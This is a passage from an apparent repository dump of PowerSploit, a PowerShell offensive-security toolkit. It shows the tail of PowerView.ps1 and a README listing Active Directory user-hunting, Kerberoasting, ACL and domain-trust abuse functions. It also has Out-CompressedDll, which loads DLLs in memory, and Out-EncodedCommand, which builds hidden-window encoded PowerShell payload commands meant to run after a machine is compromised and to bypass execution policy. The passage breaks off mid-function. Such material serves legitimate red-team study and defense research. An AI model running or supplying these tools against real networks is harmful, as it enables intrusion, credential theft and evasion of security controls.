LogonServer = field 3 String -MarshalAs @('LPWStr')\n}\n\n# the NetSessionEnum result structure\n$SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{\n    CName = field 0 String -MarshalAs @('LPWStr')\n    UserName = field 1 String -MarshalAs @('LPWStr')\n    Time = field 2 UInt32\n    IdleTime = field 3 UInt32\n}\n\n# enum used by $LOCALGROUP_MEMBERS_INFO_2 below\n$SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{\n    SidTypeUser             = 1\n    SidTypeGroup            = 2\n    SidTypeDomain           = 3\n    SidTypeAlias            = 4\n    SidTypeWellKnownGroup   = 5\n    SidTypeDeletedAccount   = 6\n    SidTypeInvalid          = 7\n    SidTypeUnknown          = 8\n    SidTypeComputer         = 9\n}\n\n# the NetLocalGroupEnum result structure\n$LOCALGROUP_INFO_1 = struct $Mod LOCALGROUP_INFO_1 @{\n    lgrpi1_name = field 0 String -MarshalAs @('LPWStr')\n    lgrpi1_comment = field 1 String -MarshalAs @('LPWStr')\n}\n\n# the NetLocalGroupGetMembers result structure\n$LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{\n    lgrmi2_sid = field 0 IntPtr\n    lgrmi2_sidusage = field 1 $SID_NAME_USE\n    lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr')\n}\n\n# enums used in DS_DOMAIN_TRUSTS\n$DsDomainFlag = psenum $Mod DsDomain.Flags UInt32 @{\n    IN_FOREST       = 1\n    DIRECT_OUTBOUND = 2\n    TREE_ROOT       = 4\n    PRIMARY         = 8\n    NATIVE_MODE     = 16\n    DIRECT_INBOUND  = 32\n} -Bitfield\n$DsDomainTrustType = psenum $Mod DsDomain.TrustType UInt32 @{\n    DOWNLEVEL   = 1\n    UPLEVEL     = 2\n    MIT         = 3\n    DCE         = 4\n}\n$DsDomainTrustAttributes = psenum $Mod DsDomain.TrustAttributes UInt32 @{\n    NON_TRANSITIVE      = 1\n    UPLEVEL_ONLY        = 2\n    FILTER_SIDS         = 4\n    FOREST_TRANSITIVE   = 8\n    CROSS_ORGANIZATION  = 16\n    WITHIN_FOREST       = 32\n    TREAT_AS_EXTERNAL   = 64\n}\n\n# the DsEnumerateDomainTrusts result structure\n$DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{\n    NetbiosDomainName = field 0 String -MarshalAs @('LPWStr')\n    DnsDomainName = field 1 String -MarshalAs @('LPWStr')\n    Flags = field 2 $DsDomainFlag\n    ParentIndex = field 3 UInt32\n    TrustType = field 4 $DsDomainTrustType\n    TrustAttributes = field 5 $DsDomainTrustAttributes\n    DomainSid = field 6 IntPtr\n    DomainGuid = field 7 Guid\n}\n\n# used by WNetAddConnection2W\n$NETRESOURCEW = struct $Mod NETRESOURCEW @{\n    dwScope =         field 0 UInt32\n    dwType =          field 1 UInt32\n    dwDisplayType =   field 2 UInt32\n    dwUsage =         field 3 UInt32\n    lpLocalName =     field 4 String -MarshalAs @('LPWStr')\n    lpRemoteName =    field 5 String -MarshalAs @('LPWStr')\n    lpComment =       field 6 String -MarshalAs @('LPWStr')\n    lpProvider =      field 7 String -MarshalAs @('LPWStr')\n}\n\n# all of the Win32 API functions we need\n$FunctionDefinitions = @(\n    (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),\n    (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),\n    (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),\n    (func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),\n    (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),\n    (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())),\n    (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())),\n    (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])),\n    (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),\n    (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError),\n    (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])),\n    (func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError),\n    (func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError),\n    (func advapi32 RevertToSelf ([Bool]) @() -SetLastError),\n    (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])),\n    (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),\n    (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),\n    (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])),\n    (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])),\n    (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])),\n    (func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])),\n    (func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])),\n    (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError)\n)\n\n$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'\n$Netapi32 = $Types['netapi32']\n$Advapi32 = $Types['advapi32']\n$Wtsapi32 = $Types['wtsapi32']\n$Mpr = $Types['Mpr']\n$Kernel32 = $Types['kernel32']\n\nSet-Alias Get-IPAddress Resolve-IPAddress\nSet-Alias Convert-NameToSid ConvertTo-SID\nSet-Alias Convert-SidToName ConvertFrom-SID\nSet-Alias Request-SPNTicket Get-DomainSPNTicket\nSet-Alias Get-DNSZone Get-DomainDNSZone\nSet-Alias Get-DNSRecord Get-DomainDNSRecord\nSet-Alias Get-NetDomain Get-Domain\nSet-Alias Get-NetDomainController Get-DomainController\nSet-Alias Get-NetForest Get-Forest\nSet-Alias Get-NetForestDomain Get-ForestDomain\nSet-Alias Get-NetForestCatalog Get-ForestGlobalCatalog\nSet-Alias Get-NetUser Get-DomainUser\nSet-Alias Get-UserEvent Get-DomainUserEvent\nSet-Alias Get-NetComputer Get-DomainComputer\nSet-Alias Get-ADObject Get-DomainObject\nSet-Alias Set-ADObject Set-DomainObject\nSet-Alias Get-ObjectAcl Get-DomainObjectAcl\nSet-Alias Add-ObjectAcl Add-DomainObjectAcl\nSet-Alias Invoke-ACLScanner Find-InterestingDomainAcl\nSet-Alias Get-GUIDMap Get-DomainGUIDMap\nSet-Alias Get-NetOU Get-DomainOU\nSet-Alias Get-NetSite Get-DomainSite\nSet-Alias Get-NetSubnet Get-DomainSubnet\nSet-Alias Get-NetGroup Get-DomainGroup\nSet-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup\nSet-Alias Get-NetGroupMember Get-DomainGroupMember\nSet-Alias Get-NetFileServer Get-DomainFileServer\nSet-Alias Get-DFSshare Get-DomainDFSShare\nSet-Alias Get-NetGPO Get-DomainGPO\nSet-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup\nSet-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping\nSet-Alias Find-GPOComputerAdmin Get-DomainGPOComputerLocalGroupMapping\nSet-Alias Get-LoggedOnLocal Get-RegLoggedOn\nSet-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess\nSet-Alias Get-SiteName Get-NetComputerSiteName\nSet-Alias Get-Proxy Get-WMIRegProxy\nSet-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn\nSet-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection\nSet-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive\nSet-Alias Get-NetProcess Get-WMIProcess\nSet-Alias Invoke-ThreadedFunction New-ThreadedFunction\nSet-Alias Invoke-UserHunter Find-DomainUserLocation\nSet-Alias Invoke-ProcessHunter Find-DomainProcess\nSet-Alias Invoke-EventHunter Find-DomainUserEvent\nSet-Alias Invoke-ShareFinder Find-DomainShare\nSet-Alias Invoke-FileFinder Find-InterestingDomainShareFile\nSet-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember\nSet-Alias Get-NetDomainTrust Get-DomainTrust\nSet-Alias Get-NetForestTrust Get-ForestTrust\nSet-Alias Find-ForeignUser Get-DomainForeignUser\nSet-Alias Find-ForeignGroup Get-DomainForeignGroupMember\nSet-Alias Invoke-MapDomainTrust Get-DomainTrustMapping\nSet-Alias Get-DomainPolicy Get-DomainPolicyData\n"
  },
  {
    "path": "Recon/README.md",
    "content": "To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\r\n\r\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\r\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\r\n\r\nTo use the module, type `Import-Module Recon`\r\n\r\nTo see the commands imported, type `Get-Command -Module Recon`\r\n\r\nFor help on each individual command, Get-Help is your friend.\r\n\r\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.\r\n\r\n\r\n## PowerView\r\n\r\nPowerView is a PowerShell tool to gain network situational awareness on \r\nWindows domains. It contains a set of pure-PowerShell replacements for various \r\nwindows \"net *\" commands, which utilize PowerShell AD hooks and underlying \r\nWin32 API functions to perform useful Windows domain functionality.\r\n\r\nIt also implements various useful metafunctions, including some custom-written \r\nuser-hunting functions which will identify where on the network specific users \r\nare logged into. It can also check which machines on the domain the current \r\nuser has local administrator access on. Several functions for the enumeration\r\nand abuse of domain trusts also exist. See function descriptions for appropriate \r\nusage and available options. For detailed output of underlying functionality, pass \r\nthe -Verbose or -Debug flags.\r\n\r\nFor functions that enumerate multiple machines, pass the -Verbose flag to get a\r\nprogress status as each host is enumerated. Most of the \"meta\" functions accept \r\nan array of hosts from the pipeline.\r\n\r\n\r\n### Misc Functions:\r\n    Export-PowerViewCSV             -   thread-safe CSV append\r\n    Resolve-IPAddress               -   resolves a hostname to an IP\r\n    ConvertTo-SID                   -   converts a given user/group name to a security identifier (SID)\r\n    Convert-ADName                  -   converts object names between a variety of formats\r\n    ConvertFrom-UACValue            -   converts a UAC int value to human readable form\r\n    Add-RemoteConnection            -   pseudo \"mounts\" a connection to a remote path using the specified credential object\r\n    Remove-RemoteConnection         -   destroys a connection created by New-RemoteConnection\r\n    Invoke-UserImpersonation        -   creates a new \"runas /netonly\" type logon and impersonates the token\r\n    Invoke-RevertToSelf             -   reverts any token impersonation\r\n    Get-DomainSPNTicket             -   request the kerberos ticket for a specified service principal name (SPN)\r\n    Invoke-Kerberoast               -   requests service tickets for kerberoast-able accounts and returns extracted ticket hashes\r\n    Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion\r\n\r\n\r\n### Domain/LDAP Functions:\r\n    Get-DomainDNSZone               -   enumerates the Active Directory DNS zones for a given domain\r\n    Get-DomainDNSRecord             -   enumerates the Active Directory DNS records for a given zone\r\n    Get-Domain                      -   returns the domain object for the current (or specified) domain\r\n    Get-DomainController            -   return the domain controllers for the current (or specified) domain\r\n    Get-Forest                      -   returns the forest object for the current (or specified) forest\r\n    Get-ForestDomain                -   return all domains for the current (or specified) forest\r\n    Get-ForestGlobalCatalog         -   return all global catalogs for the current (or specified) forest\r\n    Find-DomainObjectPropertyOutlier-   inds user/group/computer objects in AD that have 'outlier' properties set\r\n    Get-DomainUser                  -   return all users or specific user objects in AD\r\n    New-DomainUser                  -   creates a new domain user (assuming appropriate permissions) and returns the user object\r\n    Set-DomainUserPassword          -   sets the password for a given user identity and returns the user object\r\n    Get-DomainUserEvent             -   enumerates account logon events (ID 4624) and Logon with explicit credential events\r\n    Get-DomainComputer              -   returns all computers or specific computer objects in AD\r\n    Get-DomainObject                -   returns all (or specified) domain objects in AD\r\n    Set-DomainObject                -   modifies a gven property for a specified active directory object\r\n    Get-DomainObjectAcl             -   returns the ACLs associated with a specific active directory object\r\n    Add-DomainObjectAcl             -   adds an ACL for a specific active directory object\r\n    Find-InterestingDomainAcl       -   finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects\r\n    Get-DomainOU                    -   search for all organization units (OUs) or specific OU objects in AD\r\n    Get-DomainSite                  -   search for all sites or specific site objects in AD\r\n    Get-DomainSubnet                -   search for all subnets or specific subnets objects in AD\r\n    Get-DomainSID                   -   returns the SID for the current domain or the specified domain\r\n    Get-DomainGroup                 -   return all groups or specific group objects in AD\r\n    New-DomainGroup                 -   creates a new domain group (assuming appropriate permissions) and returns the group object\r\n    Get-DomainManagedSecurityGroup  -   returns all security groups in the current (or target) domain that have a manager set\r\n    Get-DomainGroupMember           -   return the members of a specific domain group\r\n    Add-DomainGroupMember           -   adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so\r\n    Get-DomainFileServer            -   returns a list of servers likely functioning as file servers\r\n    Get-DomainDFSShare              -   returns a list of all fault-tolerant distributed file systems for the current (or specified) domain\r\n\r\n   \r\n### GPO functions\r\n\r\n    Get-DomainGPO                           -   returns all GPOs or specific GPO objects in AD\r\n    Get-DomainGPOLocalGroup                 -   returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences\r\n    Get-DomainGPOUserLocalGroupMapping      -   enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation\r\n    Get-DomainGPOComputerLocalGroupMapping  -   takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation\r\n    Get-DomainPolicy                        -   returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller\r\n\r\n\r\n### Computer Enumeration Functions\r\n\r\n    Get-NetLocalGroup                   -   enumerates the local groups on the local (or remote) machine\r\n    Get-NetLocalGroupMember             -   enumerates members of a specific local group on the local (or remote) machine\r\n    Get-NetShare                        -   returns open shares on the local (or a remote) machine\r\n    Get-NetLoggedon                     -   returns users logged on the local (or a remote) machine\r\n    Get-NetSession                      -   returns session information for the local (or a remote) machine\r\n    Get-RegLoggedOn                     -   returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys\r\n    Get-NetRDPSession                   -   returns remote desktop/session information for the local (or a remote) machine\r\n    Test-AdminAccess                    -   rests if the current user has administrative access to the local (or a remote) machine\r\n    Get-NetComputerSiteName             -   returns the AD site where the local (or a remote) machine resides\r\n    Get-WMIRegProxy                     -   enumerates the proxy server and WPAD conents for the current user\r\n    Get-WMIRegLastLoggedOn              -   returns the last user who logged onto the local (or a remote) machine\r\n    Get-WMIRegCachedRDPConnection       -   returns information about RDP connections outgoing from the local (or remote) machine\r\n    Get-WMIRegMountedDrive              -   returns information about saved network mounted drives for the local (or remote) machine\r\n    Get-WMIProcess                      -   returns a list of processes and their owners on the local or remote machine\r\n    Find-InterestingFile                -   searches for files on the given path that match a series of specified criteria\r\n\r\n\r\n### Threaded 'Meta'-Functions\r\n\r\n    Find-DomainUserLocation             -   finds domain machines where specific users are logged into\r\n    Find-DomainProcess                  -   finds domain machines where specific processes are currently running\r\n    Find-DomainUserEvent                -   finds logon events on the current (or remote domain) for the specified users\r\n    Find-DomainShare                    -   finds reachable shares on domain machines\r\n    Find-InterestingDomainShareFile     -   searches for files matching specific criteria on readable shares in the domain\r\n    Find-LocalAdminAccess               -   finds machines on the local domain where the current user has local administrator access\r\n    Find-DomainLocalGroupMember         -   enumerates the members of specified local group on machines in the domain\r\n\r\n\r\n### Domain Trust Functions:\r\n    Get-DomainTrust                     -   returns all domain trusts for the current domain or a specified domain\r\n    Get-ForestTrust                     -   returns all forest trusts for the current forest or a specified forest\r\n    Get-DomainForeignUser               -   enumerates users who are in groups outside of the user's domain\r\n    Get-DomainForeignGroupMember        -   enumerates groups with users outside of the group's domain and returns each foreign member\r\n    Get-DomainTrustMapping              -   this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds\r\n"
  },
  {
    "path": "Recon/Recon.psd1",
    "content": "@{\r\n\r\n# Script module or binary module file associated with this manifest.\r\nModuleToProcess = 'Recon.psm1'\r\n\r\n# Version number of this module.\r\nModuleVersion = '3.0.0.0'\r\n\r\n# ID used to uniquely identify this module\r\nGUID = '7e775ad6-cd3d-4a93-b788-da067274c877'\r\n\r\n# Author of this module\r\nAuthor = 'Matthew Graeber', 'Will Schroeder'\r\n\r\n# Copyright statement for this module\r\nCopyright = 'BSD 3-Clause'\r\n\r\n# Description of the functionality provided by this module\r\nDescription = 'PowerSploit Reconnaissance Module'\r\n\r\n# Minimum version of the Windows PowerShell engine required by this module\r\nPowerShellVersion = '2.0'\r\n\r\n# Functions to export from this module\r\nFunctionsToExport = @(\r\n    'Export-PowerViewCSV',\r\n    'Resolve-IPAddress',\r\n    'ConvertTo-SID',\r\n    'ConvertFrom-SID',\r\n    'Convert-ADName',\r\n    'ConvertFrom-UACValue',\r\n    'Add-RemoteConnection',\r\n    'Remove-RemoteConnection',\r\n    'Invoke-UserImpersonation',\r\n    'Invoke-RevertToSelf',\r\n    'Get-DomainSPNTicket',\r\n    'Invoke-Kerberoast',\r\n    'Get-PathAcl',\r\n    'Get-DomainDNSZone',\r\n    'Get-DomainDNSRecord',\r\n    'Get-Domain',\r\n    'Get-DomainController',\r\n    'Get-Forest',\r\n    'Get-ForestDomain',\r\n    'Get-ForestGlobalCatalog',\r\n    'Find-DomainObjectPropertyOutlier',\r\n    'Get-DomainUser',\r\n    'New-DomainUser',\r\n    'Set-DomainUserPassword',\r\n    'Get-DomainUserEvent',\r\n    'Get-DomainComputer',\r\n    'Get-DomainObject',\r\n    'Set-DomainObject',\r\n    'Set-DomainObjectOwner',\r\n    'Get-DomainObjectAcl',\r\n    'Add-DomainObjectAcl',\r\n    'Find-InterestingDomainAcl',\r\n    'Get-DomainOU',\r\n    'Get-DomainSite',\r\n    'Get-DomainSubnet',\r\n    'Get-DomainSID',\r\n    'Get-DomainGroup',\r\n    'New-DomainGroup',\r\n    'Get-DomainManagedSecurityGroup',\r\n    'Get-DomainGroupMember',\r\n    'Add-DomainGroupMember',\r\n    'Get-DomainFileServer',\r\n    'Get-DomainDFSShare',\r\n    'Get-DomainGPO',\r\n    'Get-DomainGPOLocalGroup',\r\n    'Get-DomainGPOUserLocalGroupMapping',\r\n    'Get-DomainGPOComputerLocalGroupMapping',\r\n    'Get-DomainPolicy',\r\n    'Get-NetLocalGroup',\r\n    'Get-NetLocalGroupMember',\r\n    'Get-NetShare',\r\n    'Get-NetLoggedon',\r\n    'Get-NetSession',\r\n    'Get-RegLoggedOn',\r\n    'Get-NetRDPSession',\r\n    'Test-AdminAccess',\r\n    'Get-NetComputerSiteName',\r\n    'Get-WMIRegProxy',\r\n    'Get-WMIRegLastLoggedOn',\r\n    'Get-WMIRegCachedRDPConnection',\r\n    'Get-WMIRegMountedDrive',\r\n    'Get-WMIProcess',\r\n    'Find-InterestingFile',\r\n    'Find-DomainUserLocation',\r\n    'Find-DomainProcess',\r\n    'Find-DomainUserEvent',\r\n    'Find-DomainShare',\r\n    'Find-InterestingDomainShareFile',\r\n    'Find-LocalAdminAccess',\r\n    'Find-DomainLocalGroupMember',\r\n    'Get-DomainTrust',\r\n    'Get-ForestTrust',\r\n    'Get-DomainForeignUser',\r\n    'Get-DomainForeignGroupMember',\r\n    'Get-DomainTrustMapping',\r\n    'Get-ComputerDetail',\r\n    'Get-HttpStatus',\r\n    'Invoke-Portscan',\r\n    'Invoke-ReverseDnsLookup'\r\n)\r\n\r\n# List of all files packaged with this module\r\nFileList = 'Recon.psm1', 'Recon.psd1', 'PowerView.ps1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1',\r\n               'Invoke-Portscan.ps1', 'Get-ComputerDetails.ps1', 'README.md'\r\n\r\n}\r\n"
  },
  {
    "path": "Recon/Recon.psm1",
    "content": "Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}\n"
  },
  {
    "path": "ScriptModification/Out-CompressedDll.ps1",
    "content": "function Out-CompressedDll\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nCompresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.\r\n\r\nPowerSploit Function: Out-CompressedDll  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nOut-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.\r\n\r\n.PARAMETER FilePath\r\n\r\nSpecifies the path to a managed executable.\r\n\r\n.EXAMPLE\r\n\r\nOut-CompressedDll -FilePath evil.dll\r\n\r\nDescription\r\n-----------\r\nCompresses, base64 encodes, and outputs the code required to load evil.dll in memory.\r\n\r\n.NOTES\r\n\r\nOnly pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.\r\n\r\n.LINK\r\n\r\nhttp://www.exploit-monday.com/2012/12/in-memory-dll-loading.html\r\n#>\r\n\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\r\n    [CmdletBinding()]\r\n    Param (\r\n        [Parameter(Mandatory = $True)]\r\n        [String]\r\n        $FilePath\r\n    )\r\n\r\n    $Path = Resolve-Path $FilePath\r\n\r\n    if (! [IO.File]::Exists($Path))\r\n    {\r\n        Throw \"$Path does not exist.\"\r\n    }\r\n\r\n    $FileBytes = [System.IO.File]::ReadAllBytes($Path)\r\n\r\n    if (($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '' -cne 'MZ')\r\n    {\r\n        Throw \"$Path is not a valid executable.\"\r\n    }\r\n\r\n    $Length = $FileBytes.Length\r\n    $CompressedStream = New-Object IO.MemoryStream\r\n    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)\r\n    $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)\r\n    $DeflateStream.Dispose()\r\n    $CompressedFileBytes = $CompressedStream.ToArray()\r\n    $CompressedStream.Dispose()\r\n    $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)\r\n\r\n    Write-Verbose \"Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))\"\r\n\r\n    $Output = @\"\r\n`$EncodedCompressedFile = @'\r\n$EncodedCompressedFile\r\n'@\r\n`$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)\r\n`$UncompressedFileBytes = New-Object Byte[]($Length)\r\n`$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null\r\n[Reflection.Assembly]::Load(`$UncompressedFileBytes)\r\n\"@\r\n\r\n    Write-Output $Output\r\n}\r\n"
  },
  {
    "path": "ScriptModification/Out-EncodedCommand.ps1",
    "content": "function Out-EncodedCommand\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nCompresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.\r\n\r\nPowerSploit Function: Out-EncodedCommand  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nOut-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.\r\n\r\n.PARAMETER ScriptBlock\r\n\r\nSpecifies a scriptblock containing your payload.\r\n\r\n.PARAMETER Path\r\n\r\nSpecifies the path to your payload.\r\n\r\n.PARAMETER NoExit\r\n\r\nOutputs the option to not exit after running startup commands.\r\n\r\n.PARAMETER NoProfile\r\n\r\nOutputs the option to not load the Windows PowerShell profile.\r\n\r\n.PARAMETER NonInteractive\r\n\r\nOutputs the option to not present an interactive prompt to the user.\r\n\r\n.PARAMETER Wow64\r\n\r\nCalls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.\r\n\r\n.PARAMETER WindowStyle\r\n\r\nOutputs the option to set the window style to Normal, Minimized, Maximized or Hidden.\r\n\r\n.PARAMETER EncodedOutput\r\n\r\nBase-64 encodes the entirety of the output. This is usually unnecessary and effectively doubles the size of the output. This option is only for those who are extra paranoid.\r\n\r\n.EXAMPLE\r\n\r\nOut-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}\r\n\r\npowershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\r\n\r\n.EXAMPLE\r\n\r\nOut-EncodedCommand -Path C:\\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput\r\n\r\npowershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=\r\n\r\nDescription\r\n-----------\r\nExecute the above payload for the lulz. >D\r\n\r\n.NOTES\r\n\r\nThis cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, \"PowerShell...OMFG\" (https://www.trustedsec.com/files/PowerShell_PoC.zip)\r\n\r\n.LINK\r\n\r\nhttp://www.exploit-monday.com\r\n#>\r\n\r\n    [CmdletBinding( DefaultParameterSetName = 'FilePath')]\r\n    Param (\r\n        [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]\r\n        [ValidateNotNullOrEmpty()]\r\n        [ScriptBlock]\r\n        $ScriptBlock,\r\n\r\n        [Parameter(Position = 0, ParameterSetName = 'FilePath' )]\r\n        [ValidateNotNullOrEmpty()]\r\n        [String]\r\n        $Path,\r\n\r\n        [Switch]\r\n        $NoExit,\r\n\r\n        [Switch]\r\n        $NoProfile,\r\n\r\n        [Switch]\r\n        $NonInteractive,\r\n\r\n        [Switch]\r\n        $Wow64,\r\n\r\n        [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]\r\n        [String]\r\n        $WindowStyle,\r\n\r\n        [Switch]\r\n        $EncodedOutput\r\n    )\r\n\r\n    if ($PSBoundParameters['Path'])\r\n    {\r\n        Get-ChildItem $Path -ErrorAction Stop | Out-Null\r\n        $ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path $Path))\r\n    }\r\n    else\r\n    {\r\n        $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)\r\n    }\r\n\r\n    $CompressedStream = New-Object IO.MemoryStream\r\n    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)\r\n    $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)\r\n    $DeflateStream.Dispose()\r\n    $CompressedScriptBytes = $CompressedStream.ToArray()\r\n    $CompressedStream.Dispose()\r\n    $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)\r\n\r\n    # Generate the code that will decompress and execute the payload.\r\n    # This code is intentionally ugly to save space.\r\n    